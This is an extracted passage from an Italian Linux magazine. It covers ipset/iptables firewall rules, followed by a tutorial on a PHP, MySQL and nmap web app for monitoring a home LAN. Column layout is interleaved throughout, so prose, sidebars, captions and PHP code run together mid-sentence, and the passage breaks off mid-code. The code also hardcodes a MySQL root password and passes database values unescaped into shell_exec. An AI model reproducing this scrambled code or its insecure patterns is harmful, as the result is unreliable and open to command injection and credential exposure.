e porte è hash:ip,port:
# ipset create AppSupport hash:ip,port
# ipset add AppSupport 203.0.113.5,tcp:5000
# ipset add AppSupport 203.0.113.10,tcp:5010
# ipset add AppSupport 203.0.113.42,tcp:5020
In questo caso dovete specificare due direzioni
nell’opzione --match-set: la prima per l’indirizzo e la
seconda per la porta:
# iptables -A INPUT -m set --match-set AppSupport
src,dst -j ACCEPT
Potete specificare una qualsiasi combinazione di src e dst,
per esempio dst,src o src,src, a seconda delle vostre
necessità. Le liste di coppie IP/porta e network/porta vi
permettono anche di specificare il protocollo assieme alla
porta, il che vi può far risparmiare un po’ di tempo e sforzo
nel gestire protocolli che possono sfruttare sia TCP che
UDP, come DNS o SIP. Se doveste permettere delle query
DNS e trasferimenti di zona da qualche host, potreste
usare una lista simile:
# ipset create DNS hash:ip,port
# ipset add DNS 192.0.2.200,udp:53
# ipset add DNS 192.0.2.200,tcp:53
# iptables -A FORWARD -m set --match-set DNS dst,dst
Così come iptables, ipset vi permette di caricare le regole
da un file ed effettuarne l’output in un formato adatto
al caricamento, così:
# ipset save > /path/to/ipset.save
# ipset restore < /path/to/ipset.save
Ipset vi permetterà di mantenere la configurazione del
vostro firewall più corta, leggibile e molto più facile da
mantenere. Se vi servono ulteriori informazioni potete
visitare il sito del progetto, http://ipset.netfilter.org,
e leggere le pagine man incluse nel pacchetto.
Potete creare
gruppi di host
fidati o non così
fidati piuttosto
facilmente per
indirizzi IPv4
e IPv6
 È in edicola

www.sprea.it/manualiofficinavespista

il manuale del vespista_207x285.indd 1 20/01/17 17:40

 Sicurezza di rete

Controllo totale
sulla vostra rete
Con i tool giusti, potete mettere in sicurezza
la vostra rete e proteggervi da incidenti e hacker.
Ecco come fare

V
iviamo in un mondo fortemente orientato alle reti: La piattaforma di sviluppo
dai telefoni alle televisioni, dalle console alle Prima di addentrarci nell’argomento, tuttavia, è necessario disporre
telecamere fino agli elettrodomestici, ogni oggetto di una piattaforma collegata alla rete da sottoporre a monitoraggio,
moderno è pensato in un’ottica di interconnessione, sulla quale ospitare lo sviluppo e l’esecuzione del codice PHP.
affinché possa entrare in rete con gli altri. L’avvento della Per ottimizzare l’aspetto formativo di questa serie di articoli,
domotica, di tablet e di smartphone ha esteso a dismisura supponiamo che tale rete (che simuleremo, nel prosieguo, mediante
il concetto di network, fino a renderlo quasi indipendente il ricorso al software di virtualizzazione denominato Virtualbox)
L’autore dall’ambito informatico in cui è nato: spesso nelle nostre case presenti la topologia rappresentata in Fig. 1 qui in basso, risultando
le reti sono costituite principalmente da dispositivi “intelligenti”, in tal modo segmentata in due diverse subnet:
piuttosto che da computer o altre apparecchiature “tradizionali” La subnet indicata in notazione CIDR (Classless Inter-Domain
Maurizio Russo
Laureato in
appartenenti al mondo IT. In un mondo così intimamente legato Routing) come 192.168.1.0/24, che comprende la postazione
Informatica al concetto di connessione, tuttavia, sfugge ai più un aspetto di monitoraggio (indicata come “workstation” e coincidente, come
presso tipicamente informatico delle network: quello del monitoraggio vedremo nel prossimo paragrafo, con la macchina fisica)
l’Università degli apparati interconnessi, indispensabile tanto nelle reti e la macchina denominata “NAS”;
“La Sapienza”
enterprise che in ambiente SOHO (acronimo di Small Office/ La subnet 192.168.2.0/24, a cui risultano attestati la postazione
di Roma,
con una tesi Home Office). Monitorare lo stato della rete, infatti, significa di monitoraggio e la macchina denominata router;
sperimentale verificarne costantemente la piena funzionalità, rilevando La subnet 192.168.3.0/24, sulla quale lavorano i server.
sullo stack TCP/ tempestivamente le fonti di anomalie e malfunzionamenti:
IP del kernel quante volte ci è capitato di perdere tempo nel vano tentativo
Linux, è un
utente del
di risolvere un problema di connettività attribuito a un
pinguino dal particolare dispositivo, per poi scoprire altrove la vera causa
2001. Nella del contrattempo? In questo numero e nel prossimo
sua carriera affronteremo proprio il tema del monitoraggio delle reti,
si è occupato
analizzando dapprima una soluzione da sviluppare “ad hoc”,
di formazione,
sicurezza, mediante pagine PHP in grado di interagire con il celeberrimo
networking, nmap (non a caso uno dei tool più utilizzati nei campi della
progettazione sicurezza e delle reti), per poi approdare a un prodotto
e sviluppo più professionale, in grado di coniugare potenza e flessibilità
di software.
con i principi del Software Libero. Fig.1 Questa è la nostra rete di esempio

68

Prima di poter sottoporre a monitoraggio la rete appena descritta,
tuttavia, è necessario installare innanzitutto lo stack LAMP (Linux
Apache MySQL e PHP) sulla quale sviluppare la nostra applicazione;
a tal fine, supponendo di utilizzare una distribuzione debian-based
(Ubuntu, per esempio, oppure una qualsiasi sua derivata come
Xubuntu), apriamo una shell, acquisiamo i privilegi di root (comando
sudo su) ed eseguiamo le seguenti operazioni:
1 Installazione del server Web Apache: da shell, è sufficiente digitare
il comando
apt-get install apache2
2 Verifica della corretta installazione di Apache: aperto il browser,
occorre digitare sulla barra degli indirizzi l’URL http://127.0.0.1
per verificare la raggiungibilità della pagina di default del server
(in Fig.2 è riportata la pagina di default presentata in Xubuntu 14.04;
nelle altre distribuzioni l’aspetto potrebbe variare pur mantenendo,
tuttavia, il tradizionale messaggio “It Works!” che da anni
contraddistingue le installazioni di Apache coronate da successo);
3 Creazione della directory public_html: per comodità, procediamo
alla creazione, all’interno della home dell’utente corrente, di una
sottodirectory denominata public_html, ove ospitare le pagine PHP.
Questa operazione può essere effettuata da GUI, ricorrendo al file
manager installato sul sistema, oppure aprendo una nuova shell
(è importante utilizzare una seconda shell, giacché in quella sin qui
adoperata abbiamo assunto i privilegi di root) e digitando il comando
mkdir public_html effettive le modifiche:
4 Abilitazione della directory public_html: opportunamente
configurata, la directory public_html consente di creare una document
root alternativa per le pagine Web ospitate da Apache: in aggiunta
alla document root del server (contenente, al momento, la pagina
in Fig.2 e posta, generalmente, in /var/httpd/www), viene creata
una document root “di utente”, raggiungibile all’URL
http://127.0.0.1/~nomeutente (per esempio, http://127.0.0.1/~garrick/
per la directory public_html posta all’interno dell’home dell’utente
garrick). Per motivi di sicurezza, tuttavia, il ricorso alla directory public_
html deve essere permesso esplicitamente dall’amministratore
di sistema, mediante l’abilitazione del modulo di Apache denominato
userdir: a tal fine digitiamo, dalla shell con privilegi di root, il comando
a2enmod userdir
per poi procedere al riavvio del server Web mediante il comando
service apache2 restart
5 Verifica dell’avvenuta abilitazione di public_html: dal browser,
digitiamo l’indirizzo http://127.0.0.1/~nomeutente per verificare
la raggiungibilità della directory public_html: vista l’assenza di una
pagina index nella directory, apparirà, per effetto della configurazione
di base di Apache, una pagina che mostra i contenuti della stessa
directory (Fig.3);
Fig.2 La pagina di default del server Web Apache
visualizzata sui sistemi Ubuntu e derivati
Mettere in sicurezza la LAN
Fig.3 Ecco
la prova
dell’avvenuta
abilitazione della
document root
6 Installazione di PHP: l’installazione base di Apache non prevede
la presenza dei moduli che consentono al server Web la gestione
e l’interpretazione della pagine PHP. Per ovviare a questo
inconveniente, è sufficiente digitare il comando:
apt-get install libapache2-mod-php5
7 Configurazione di PHP: terminata l’installazione, è necessario aprire
il file di configurazione del modulo PHP5 (/etc/apache2/mods-
available/php5.conf) con il comando
vi /etc/apache2/mods-available/php5.conf
e commentare le righe comprese tra i tag <IfModule mod_userdir.
c> e </IfModule> (la Fig.4 mostra il contenuto del file
di configurazione dopo la modifica sopra indicata) al fine di garantirci
la possibilità (non prevista nella configurazione di default per motivi
di sicurezza) di eseguire script PHP all’interno della directory public_
html. Possiamo quindi riavviare nuovamente Apache per rendere
service apache2 restart
8 Installazione di MySQL: allo stato, l’installazione della piattaforma
LAMP è quasi completa. Alla distribuzione GNU/Linux preesistente
abbiamo aggiunto, negli step precedenti, Apache e PHP. All’appello
manca il solo MySQL: per procedere alla sua aggiunta, ricorriamo
al comando
apt-get install mysql-server
avendo cura, quando richiesto dall’installer, di fornire (e annotare,
in quanto ci servirà nel prosieguo) la password dell’utente
amministratore del db (denominato anch’esso root);
9 Installazione di phpMyAdmin: la versione di MySQL appena installata
presenta un’architettura client-server, con un Database Server
accessibile dalla stessa macchina locale (o da una remota) attraverso
l’apposito client a riga di comando. Quest’ultimo, nonostante sia
perfettamente in grado di svolgere tutte le operazioni a noi richieste
per la creazione e l’amministrazione del piccolo database su cui
poggerà la Web application, può risultare ai neofiti un po’ ostico,
Fig.4 Il file php5.conf dopo le modifiche necessarie
a consentire l’esecuzione di codice PHP dalla directory
public_html
69
 Sicurezza di rete
Fig.5 Nel corso
dell’installazione
di MySQL viene
visualizzata questa
schermata,
per la selezione
del server Web
con cui il DBMS
dovrà integrarsi
in quanto richiede un certo grado di conoscenza del DBMS e del
linguaggio SQL. Per semplificare, e consentire di focalizzare la nostra Fig.7 La creazione della tabella “categoria” tramite phpMyAdmin
attenzione sul monitoraggio vero e proprio piuttosto che sugli elementi
di contorno, è preferibile ricorrere a una applicazione ad hoc come connessa, infatti, dovrà appartenere a una delle categorie
phpMyAdmin, che offre una GUI semplice e intuitiva attraverso elencate in questa tabella);
la quale gestire il database. Per installare phpMyAdmin, è sufficiente una tabella denominata “apparato”, in cui inseriremo i dati di tutti
digitare il comando gli apparati della rete oggetto di monitoraggio.
apt-get install phpMyAdmin Grazie al database così definito, la nostra applicazione potrà tracciare
avendo cura, in prima battuta, di scegliere apache2 nell’apposita gli indirizzi IP di ogni apparecchiatura della rete, conservandone
schermata (Fig.5) di selezione del server Web con cui l’applicazione al contempo una breve descrizione, utile all’operatore per identificare
dovrà integrarsi, per poi optare per la configurazione automatica velocemente il dispositivo oggetto di avaria: l’idea alla base della nostra
attraverso dbconfig-common. In questa sede, sarà richiesta Web application, infatti, è quella di verificare a intervalli periodici
l’immissione della password dell’utente root di MySQL, l’effettiva raggiungibilità degli apparati oggetto di monitoraggio,
precedentemente stabilita, nonchè la scelta della password utilizzata mostrando poi l’indirizzo IP e la descrizione dei dispositivi
per registrare phpMyAdmin sul server MySQL. che risultassero non connessi alla rete. Affinché ciò sia possibile,
è necessario innanzitutto procedere alla creazione del database,
Il database di back-end attraverso l’interfaccia grafica offerta da phpMyAdmin: avviato
Terminata l’installazione della piattaforma di sviluppo (operazione il browser, visualizziamo la pagina corrispondente all’URL
che, nonostante la relativa onerosità in termini di tempo e di pazienza, http://127.0.0.1/phpMyAdmin, quindi inseriamo username (root)
ha il vantaggio di dover essere eseguita una sola volta nella vita di una e password precedentemente impostate per l’accesso a MySQL.
macchina LAMP, indipendentemente dal numero di Web application La creazione del database si effettua con pochi click: è sufficiente
sviluppate), possiamo finalmente dedicarci alla nostra applicazione. selezionare la scheda database, quindi inserire il nome del db
Il primo passo da compiere consiste nella progettazione, creazione, da creare (monitoraggio, nel nostro caso) e premere il pulsante Crea.
e popolamento del database di monitoraggio, nel quale andremo Impostato il database, è tempo di definirne le tabelle: selezioniamo
a convogliare tutte le informazioni inerenti: il database monitoraggio e inseriamo, nel riquadro denominato non
la classificazione dei dispositivi oggetto di monitoraggio (client, a caso Crea tabella (Fig.7), il nome (categoria) e il numero di campi
server, router, ecc.);
gli indirizzi IP e gli estremi di identificazione delle macchine
da monitorare.
Sulla base di questa descrizione, e del modello concettuale
derivante (in Fig.6, la rappresentazione grafica del modello
concettuale, mediante schema Entità/Relazione), il nostro
database sarà costituito da due tabelle:
una tabella denominata “categoria”, cui spetterà il compito
di classificare i dispositivi presenti sulla rete (ogni apparecchiatura

Fig.6 Questo è lo schema completo di Entità/Relazione del database su cui Fig.8 La maschera di configurazione dei campi della tabella
si appoggia la nostra Web application “categoria”

Usare il comando Nmap

Il comando nmap è uno dei più diffusi (e potenti)
port scanner disponibili in ambiente GNU/Linux.
In grado di scansionare tanto intere network
quanto singoli host, si presta a una molteplicità
di impieghi, tra i quali possiamo citare:
L’individuazione dei servizi offerti da un host;
Il fingerprint del sistema operativo di un host
remoto (ovvero l’individuazione del sistema
operativo installato sul computer);
La rilevazione della presenza di un firewall
posto a protezione dei sistemi scansionati;
L’individuazione degli host disponibili
su una rete.
Per quanto attiene, in particolare, quest’ultima
funzionalità, nmap dispone di un’apposita opzione
(-sP), utilizzabile per la determinazione:
Dell’effettiva raggiungibilità di un insieme
di host identificati mediante l’indirizzo IP:
# nmap -sP 192.168.1.1 192.168.1.2
192.168.1.3
Del numero e degli indirizzi IP raggiungibili
in una data rete, identificata mediante
la semplice notazione CIDR:
# nmap -sP 192.168.1.0/24

70

Fig.9 Ecco come si presenta la maschera di configurazione
dei campi della tabella “apparati”
(2, come da schema E/R in Fig.6). Dopo aver premuto il tasto Esegui
apparirà la maschera di configurazione dei campi della tabella,
contenente per l’appunto due righe ove dovremo inserire (Fig.8)
le medesime informazioni riportate nel già citato schema E/R:
nella prima riga, inseriamo come nome “id_categoria” e come tipo
“INT”, avendo cura di flaggare il campo A_I per ottenere l’incremento
automatico, a cura dello stesso DBMS, del valore dell’id, che costituisce
la chiave primaria della tabella;
nella seconda riga, inseriamo come nome “descrizione_categoria”,
come tipo “Varchar” e come lunghezza 50.
Un click sul pulsante Esegui terminerà l’operazione di immissione
dei dati, determinando la creazione della tabella richiesta. La creazione
della seconda tabella, denominata “apparato”, richiede
un procedimento analogo, basato sull’immissione, nella maschera
dedicata alla definizione dei campi, delle seguenti stringhe (Fig.9):
prima riga: nome “id_apparato”, tipo “INT”, campo A_I selezionato;
seconda riga: nome “id_categoria”, tipo “INT”;
terza riga: nome “ip_apparato”, tipo “Varchar”, lunghezza 16;
quarta riga: nome “descrizione_apparato”, tipo “Varchar”, l. 200.
Un osservatore attento ma superficiale potrebbe rilevare un’incongruità
sul secondo campo (“id_categoria”), in quanto assente nello schema
E/R di riferimento: il modello concettuale (Fig.6), infatti, mostra per
la tabella solo tre attributi, a fronte dei quattro appena inseriti.
L’attributo in questione, tuttavia, viene derivato proprio dallo schema
E/R, in quanto rappresenta la concretizzazione del legame (detto
associazione) tra le due entità (le tabelle) di riferimento: attraverso
l’inserimento, nella tabella apparato, del campo id_categoria
(corrispondente, non a caso, alla chiave primaria della tabella
categoria), si tiene traccia univocamente della relazione tra ogni
apparato e la categoria di riferimento. Chiarito l’apparente equivoco,
possiamo dedicarci all’ultimo compito propedeutico alla realizzazione
Fig.10 Dopo aver completato l’inserimento delle prime due
categorie nel database, occorre verificare che i due menu
a tendina posti in prossimità del pulsante Esegui presentino
i valori Inserisci come nuova riga e Inserisci un nuovo record
Mettere in sicurezza la LAN
Fig.11 Ecco i contenuti della tabella “categoria” a seguito degli
inserimenti effettuati nella fase di popolamento del database
della nostra Web application: il popolamento del database, da eseguire
(in considerazione dell’associazione appena trattata tra le due entità)
a partire dalla tabella categoria. Dall’osservazione dello schema di rete
in Fig.1, appare chiara la necessità di inserire ben quattro gruppi
all’interno della tabella, corrispondenti alle categorie:
workstation;
NAS;
router;
server.
Cliccando sul nome della tabella d’interesse, e selezionando il pulsante
Inserisci posto in alto alla pagina, è possibile procedere all’inserimento
delle prime due categorie. Prima di confermare l’operazione, mediante
un click sul pulsante Esegui, è bene verificare che i due menu a
tendina posti alla stessa altezza del pulsante presentino i valori “Inserisci
come nuova riga” e “Inserisci un nuovo record” (Fig.10): in questo
modo, phpMyAdmin provvederà alla scrittura dei record nella tabella,
presentando al termine dell’operazione la maschera per l’inserimento
delle due rimanenti categorie (router e server). Si noti, in particolare,
l’utilità del flag Autoincrement, selezionato all’atto della creazione della
tabella per il campo id_categoria, che ci esonera dalla necessità
di specificare un valore (assegnato automaticamente dal DBMS)
in sede di inserimento del record. Esaurite le categorie, passiamo alla
tabella apparato: sebbene l’inserimento segua le medesime modalità,
in questo caso è necessario specificare il valore di un numero
maggiore di campi per ogni record. La presenza nello schema della
tabella del campo id_categoria, inoltre, ci obbliga a tener traccia delle
categorie appena inserite, e degli id assegnati a ciascuna di esse
direttamente dal DBMS: a tal fine, è opportuno dare un’occhiata
ai contenuti della tabella categoria (Fig.11), mediante un click
sull’omonima voce del menu posto nella parte sinistra dell’interfaccia
di phpMyAdmin. Cliccando quindi sul nome della tabella apparato,
e selezionando più volte il link Inserisci, è finalmente possibile
procedere all’inserimento:
primo apparato (la workstation mostrata nello schema in Fig.1):
campo id_apparato vuoto, campo id_categoria pari a 1, ip_apparato
192.168.2.3, descrizione “Il mio PC”;
secondo apparato (indicato comr NAS nello schema in Fig.1):
campo id_apparato vuoto, campo id_categoria pari a 2, ip_apparato
192.168.1.100, descrizione “NAS della rete”;
terzo apparato (l’unico router presente nello schema in Fig.1):
campo id_apparato vuoto, campo id_categoria pari a 3, ip_apparato
192.168.2.1, descrizione “router della rete”;
quarto apparato (il server denominato serverA in Fig.1): campo id_
apparato vuoto, campo id_categoria pari a 4, ip_apparato
192.168.3.101, descrizione “file server”;
quinto apparato (serverB): campo id_apparato vuoto, campo
id_categoria pari a 4, ip_apparato 192.168.3.100, descrizione
71
 Sicurezza di rete
Fig.12 La tabella Apparati, visualizzata dopo gli inserimenti
effettuati nella fase di popolamento del database
“mail server”.Al termine delle operazioni saremo ricompensati dalla
visione dei contenuti della tabella apparato, finalmente coerenti
con lo schema della rete da monitorare (Fig.12).
Il codice PHP
Popolato adeguatamente il database, possiamo finalmente dedicarci
alla scrittura del codice PHP. Con un editor di testo (anche il semplice
gedit può bastare) creiamo un file denominato monitoraggio.php,
da salvare all’interno della cartella public_html. Questo file costituirà
la pagina principale della nostra applicazione di monitoraggio, a cui
spetterà il compito di presentare un vero e proprio cockpit operativo
recante una panoramica completa dello stato della rete. La logica
di funzionamento della pagina, peraltro già delineata nel precedente
paragrafo, è basata sui seguenti step:
1 Interrogazione del database, tesa a conoscere l’elenco delle
categorie presenti nella rete e, per ognuna di esse, il numero
e gli indirizzi IP dei relativi apparati;
2 Esecuzione di un ping multiplo, su tutti gli indirizzi IP degli apparati
della rete, mediante il tool nmap (vedi il box omonimo);
3 Analisi dei risultati di nmap, al fine di verificare quali indirizzi IP
risultino raggiungibili per ogni categoria definita nel db;
4 Presentazione all’utente di una schermata di sintesi, con una tabella
che mostri graficamente lo stato di ciascuna categoria (ovvero che
mostri un allarme qualora non tutti gli apparati della categoria risultino
raggiungibili), lasciando a una seconda pagina PHP il compito
di elencare quali siano gli apparati “in avaria”.
Le macrocomponenti sopra descritte si traducono nel seguente codice:
1 Interrogazione del database: l’interrogazione del database comporta
l’esecuzione di una pluralità di operazioni, a partire dalla connessione al
DBMS, la selezione del database di monitoraggio e l’esecuzione della
query SQL per ottenere l’elenco delle categorie inserite nel DB:
/* 1. Connessione al DBMS */
$db= mysql_connect(“127.0.0.1”,”root”,”password”) or die(‘Errore:
impossibile connettersi al server MySql!’);
/* 2. Selezione del database di monitoraggio */
mysql_select_db(“monitoraggio”) or die(‘Errore: impossibile accedere
al database di monitoraggio!’);
/* 3. esecuzione della query per conoscere le categorie inserite nel db
*/
$query=”SELECT * from categoria”;
$categorie=mysql_query($query,$db) or die(‘Errore: impossibile
eseguire query sul db!’);
Per ogni categoria è quindi necessario recuperare tutte le informazioni
(in particolare, indirizzo IP e descrizione) relative a tutti gli apparati
di appartenenza: interrogato il database mediante un’apposita query
SQL, conserveremo le informazioni acquisite all’interno di appositi
array, in grado di assicurarci l’immediata disponibilità dei dati necessari
72
alla presentazione dei risultati di monitoraggio. In particolare, nel
vettore $nomeCat saranno salvati i nomi delle categorie, nel vettore
$idCat i relativi id, mentre $descApparatiCat e $ipApparatiCat
conterranno, rispettivamente, l’insieme delle descrizioni e degli IP
di tutti gli apparati di ciascuna categoria. Si noti come, dalla descrizione
di questi ultimi array, ne emerga chiaramente la natura bidimensionale:
ciascun elemento, infatti, corrisponde all’insieme delle descrizioni
(o degli IP) di tutti gli apparati di una certa categoria. Al contrario
di $nomeCat e $idCat, in cui ogni elemento è un singolo valore
(il nome di una certa categoria o il suo id), $descApparatiCat
e $ipApparatiCat contengono, per ciascuna categoria, un elemento
che coincide con l’array delle descrizioni (o degli IP) di tutti gli apparati
della categoria in questione. In merito agli IP, inoltre, è necessaria
un’ulteriore precisazione: per l’esecuzione di ping multipli nmap (come
visto nel già citato box Usare il comando NMAP) richiede tanti
argomenti aggiuntivi quanti sono gli indirizzi IP da verificare; al fine
di semplificare l’invocazione di questo tool, pertanto, è opportuno
conservare in un’apposita stringa ($ipCatString) l’elenco di tutti
gli indirizzi IP degli apparati della rete, opportunamente separati
gli uni dagli altri mediante il ricorso a uno spazio.
/* 4. inizializziamo gli array che conterranno, rispettivamente: i nomi
delle categorie ($nomeCat), gli id associati a ciascuna categoria
($idCat), le righe estratte dal db e relative agli apparati appartenenti
alla categoria ($apparatiCat), il numero di apparati della categoria
($numApparatiCat), il vettore contenente tutti gli IP degli apparati della
categoria ($ipApparatiCat) e la stringa contenente i medesimi IP
($ipCatString) */
$nomeCat=array();
$idCat=array();
$descApparatiCat=array();
$numApparatiCat=array();
$ipApparatiCat=array();
$ipCatString=””;
/* 5. per ogni categoria...*/
for($i=0; $i<$numCategorie; $i++)
{
/* ... estraiamo una riga restituita dalla query precedente... */
$unaCategoria= mysql_fetch_assoc($categorie);
/*... alimentiamo di conseguenza gli array $nomeCat e
$idCat ...*/
$idCat[$i]=$unaCategoria[“id_categoria”];
$nomeCat[$i]=$unaCategoria[“nome_categoria”];
/*...otteniamo, attraverso una seconda query sul db, il
numero e la lista degli ip degli apparati di ogni categoria...*/
$query = “SELECT ip_apparato, descrizione_apparato
FROM apparato WHERE id_categoria=”.$idCat[$i];
$apparati=mysql_query($query,$db) or die(‘Errore:
impossibile eseguire query sul db!’);
/*...conteggio del numero di apparati inseriti nella categoria
corrente ... */
$numApparatiCat[$i]=mysql_num_rows($apparati);
/*... se non ci sono apparati, inutile proseguire...*/
if ($numApparatiCat[$i]>0)
{
/* Per ogni apparato della categoria, aggiorniamo
opportunamente i vettori $descApparatiCat, $ipApparatiCat, nonché
la stringa ipCatString necessaria a completare il comando nmap */
$descrizione=array();
$ip=array();
for($j=0;$j<$numApparatiCat[$i];$j++)
{
 Mettere in sicurezza la LAN
/* ... estraiamo una riga restituita dalla query precedente
e salviamone i contenuti... */
$unApparato= mysql_fetch_assoc($apparati);
$ip[$j]=$unApparato[“ip_apparato”];
$descrizione[$j]=$unApparato[“descrizione_apparato”];
$ipCatString.=$ip[$j].” “;
Fig.13
}
Un esempio
$descApparatiCat[$i]=$descrizione;
dell’output
$ipApparatiCat[$i]=$ip; restituito da nmap
} quando questo
} è invocato con
2 Esecuzione del ping su tutti gli apparati di rete: grazie al lavoro svolto l’opzione “-sP”
nel punto precedente, l’esecuzione del ping si esaurisce
nell’invocazione di nmap (mediante la funzione PHP shell_exec(), /* ...carichiamo in $ip l’array contenente tutti gli apparati
che ritorna una stringa contenente l’output del comando di shell della categoria corrente...*/
eseguito) con l’opzione corretta (-sP) e al contestuale passaggio, come $ip=$ipApparatiCat[$i];
argomento, della stringa $ipCatString: $desc=$descApparatiCat[$i];
/* 6. avviamo nmap, passandogli gli indirizzi IP racconti in $ipCatString*/ /*...inizializziamo a zero il numero di apparati della categoria
$cmd=”nmap -sP “.$ipCatString; che sono irraggiungibili...*/
$nmap=shell_exec($cmd); $down=0;
3 Analisi dei risultati di nmap: invocato con l’opzione -sP seguita /*...inizializziamo, con una stringa vuota, la variabile
da un elenco di indirizzi IP, nmap restituisce un output analogo a quello contenente la stringa degli IP irraggiungibili per la categoria corrente
raffigurato in Fig.13, in cui sono riportati gli indirizzi IP dei soli host ($downString) e la relativa descrizione ($downDesc)...*/
risultati raggiungibili. Possiamo sfruttare questa peculiarità per $downString=””;
semplificare l’analisi dei ping: per ciascuna categoria, sarà controllato $downDesc=””;
l’array $ipApparatiCat, per consentire la ricerca di ogni indirizzo IP /*...per ogni indirizzo IP di ogni apparato della categoria...*/
all’interno dell’output di nmap. Tale ricerca può essere condotta for($j=0;$j<$numApparatiCat[$i];$j++)
in modo semplice ed efficace mediante il ricorso alla funzione PHP {
strpos() che, prese come argomenti due stringhe, restituisce il valore /*...l’output di nmap contiene un a capo newline, ovvero il carattere 10
false se non è presente alcuna occorrenza della seconda stringa del codice ASCII, rappresentato con la sequenza di escape ‘\n’) dopo
all’interno della prima: anche in questo caso provvederemo, per ogni indirizzo IP rilevato: viene quindi aggiunto il suddetto carattere
semplicità, a conservare in appositi vettori, per ciascuna categoria, al termine dell’IP corrente per evitare falsi positivi (es. 192.168.1.1
il numero di apparati risultati non connessi alla rete ($numInattivi) rilevato erroneamente a causa della presenza, nell’output di nmap,
e le stringhe ottenute a partire da tutti gli IP di tali apparati ($inattivi) del solo 192.168.1.112)...*/
e dalle relative descrizioni ($descInattivi). In entrambe le stringhe, $IPdaCercare=$ip[$j].”\n”;
ogni elemento (singolo indirizzo IP / singola descrizione) è distinto #echo “cerco “.$IPdaCercare.”\r\n”;
dall’altro mediante il ricorso al separatore “;” (punto e virgola): /*... viene ricercato l’IP nell’output di nmap ...*/
/* 7. analizziamo i risultati di nmap cercando, per ogni categoria, quanti if(strpos($nmap,$IPdaCercare)===false)
IP sono presenti nell’output di nmap (e pertanto raggiungibili con ping) {
e quanti invece non lo sono */ /*...se strpos restituisce false, l’IP non è presente nell’output di nmap,
$inattivi=array(); ed è quindi relativo a un apparato inattivo...*/
$numInattivi=array(); $downString.=$ip[$j].”;”;
$descInattivi=array(); $downDesc.=$desc[$j].”;”;
/* per ogni categoria...*/ $down++;
for($i=0; $i<$numCategorie; $i++) }
{ }

PHP: GET e POST

Il protocollo HTTP è un protocollo di tipo client/
server, in cui il server fornisce una determinata
risposta (per esempio, il contenuto di una pagina
Web) a seguito di specifica richiesta del client.
Il formato della richiesta e della relativa risposta sono
disciplinate dal documento RFC (Request For
Comment) di riferimento (il numero 2616 per
l’ultima versione del protocollo, la 1.1) che prevede
la possibilità, da parte del client, di effettuare
un certo insieme di richieste, mediante l’invocazione
di appositi metodi. Tra questi ultimi, i più diffusi sono
senz’altro il metodo GET e il metodo POST: sebbene
nati per scopi distinti, sono sostanzialmente
intercambiabili quando adoperati al solo scopo
di determinare il download di una risorsa residente
sul server e presentano apprezzabili differenze solo
se impiegati nell’ambito del passaggio di parametri
da una pagina Web all’altra. Il metodo GET prevede
di accodare tali parametri all’URL della pagina.
Per esempio, la richiesta GET http://prova.php?par
ametro1=100&paremetro2=900 richiede al
server Web la visualizzazione della pagina prova.php
e il contestuale passaggio a quest’ultima di due
parametri, denominati parametro1 e parametro2,
a cui sono assegnati, rispettivamente, i valori 100
e 900. Il metodo POST invece chiede l’invio
e la valorizzazione all’interno del corpo della richiesta
HTTP (e quindi in una modalità di fatto “invisibile”
all’utente, a meno di utilizzare tool appositi). Ogni
pagina PHP può accedere ai propri parametri GET
e POST attraverso gli array associativi $_GET[] e $_
POST[]: riprendendo l’esempio precedente, l’accesso
della pagina prova.php ai due parametri denominati
parametro1 e parametro2 avverrà grazie agli
elementi $_GET[“parametro1”] e $_
GET[“parametro2”] dell’array associativo $_GET[].

73
 Sicurezza di rete
/*...aggiorniamo l’array degli IP inattivi e del numero di IP inattivi ...*/
$inattivi[$i]=$downString;
$descInattivi[$i]=$downDesc;
$numInattivi[$i]=$down;
/*... stampiamo a video le informazioni ottenute ...*/
} <tr> <td>Categoria</td> <td>Tot. apparecchi</td> <td>Inattivi</td>
È interessante soffermarci, in particolare, sull’utilizzo della già citata
funzione strpos(): in particolare, l’istruzione di selezione
if(strpos($nmap,$IPdaCercare)===false)
fa uso dell’operatore di comparazione ‘===’ in luogo del più semplice
(e più utilizzato) ‘==’. PHP, infatti, non richiede al programmatore
di dichiarare in anticipo (al contrario di linguaggi come il C o il Java)
il tipo di ciascuna variabile, e opera automaticamente la conversione
delle variabili da un tipo all’altro, a seconda del contenuto delle stesse.
Per quanto questa caratteristica possa apparire “comoda”, presenta
allo stesso tempo alcuni “effetti collaterali” poco piacevoli, uno dei quali
può essere rilevato proprio all’atto dell’utilizzo di strpos(). In caso di
successo (ovvero se s2, la stringa passata come secondo argomento,
risulta effettivamente presente all’interno della stringa s1 fornita come
primo argomento), questa funzione restituisce la posizione della prima
occorrenza di s2 in s1: poiché, tuttavia, le posizioni vengono misurate
come offset dall’inizio della stringa (ovvero possono assumere, in una
stringa di n caratteri, i valori compresi tra 0 e n-1), cosa succede
se la stringa cercata costituisce un prefisso dell’altra, ovvero
se è presente all’inizio della prima stringa? In questo caso, ovviamente,
strpos() restituirà il valore 0 che, se confrontato con il valore false
senza adoperare gli opportuni accorgimenti, può dare adito a errate
valutazioni: nella conversione automatica operata da PHP, infatti, i
due valori, pur differendo nel tipo (in quanto costituiti da un intero
e un booleano), andrebbero a coincidere. È questo il motivo che
rende necessario il ricorso all’operatore ===, il quale considera
la comparazione vera solo se i due operandi coincidono sia per
valore sia per tipo: in questa maniera non si corre il rischio di
scambiare il valore di ritorno 0 (che, nel nostro caso, identifica una
stringa non d’interesse, in quanto relativa a un indirizzo IP compreso
nell’output di nmap, e pertanto connesso alla rete) con false
(restituito solo in presenza di un apparato risultato non collegato alla
rete, e pertanto da segnalare).
4 Presentazione della schermata di sintesi: terminati i tre step
precedenti disponiamo, negli appositi vettori, di tutte le informazioni
necessarie alla stampa a video dei risultati del monitoraggio condotto
tramite nmap. A tal fine, avvalendoci di un codice misto HTML/PHP,
possiamo creare una tabella che, per ogni categoria registrata
nel database, mostri il numero di apparati inattivi, accompagnandolo
con un segnale visivo (nello specifico un semaforo) di immediata
comprensione: una luce verde indicherà che, per la categoria
in oggetto, non è stata rilevata alcuna anomalia; viceversa una luce
Fig.14
La schermata
di creazione,
in ambiente
Virtualbox, di una
rete “solo host”
74
rossa comunicherà all’utente che almeno uno dei dispositivi rientranti
nella categoria risulta non raggiungibile.
<h1 style=”text-align : center”>Risultati del monitoraggio</h1>
<table border=”1” style=”margin-left: auto; margin-right: auto;
text-align : center”>
<td>Stato</td>
</tr>
<?php
/* per ogni categoria...*/
for($i=0; $i<$numCategorie; $i++)
{
echo “<tr>”;
echo “<td>”.$nomeCat[$i].”<td><td>”.$numApparatiCat[
